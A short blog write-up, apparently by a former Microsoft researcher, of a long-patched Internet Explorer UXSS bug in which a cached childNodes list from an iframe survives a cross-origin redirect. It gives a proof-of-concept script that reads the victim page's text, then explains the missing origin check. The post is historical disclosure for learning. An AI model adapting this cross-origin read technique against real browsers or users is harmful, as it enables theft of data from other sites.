UXSS: Cached childNodes Collection Survives Cross-Origin Redirect

Another variant of the cached-collection UXSS family: document.childNodes from a same-origin IFrame remained live after a cross-origin redirect, and its nodes’ ownerDocument pointed into the new cross-origin document.

var xChildNodes = iFrame.document.childNodes;

// Redirect the IFrame cross-origin
iFrame.location = "http://www.victim.com/";

// After navigation:
setTimeout(function() {
    alert(xChildNodes[0].ownerDocument.body.innerText); // Cross-origin read
}, 2000);

The NodeList returned by childNodes held direct references to the underlying markup nodes. When the document was replaced by the cross-origin navigation, the node list was not invalidated, and the nodes’ ownerDocument pointer was updated to the new document without re-applying origin checks.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 UXSS: Object.defineProperty Intercepts Cross-Origin Navigation] :: [IE9 UXSS: location Object Called as a Function Bypasses javascript: Protocol Safety] >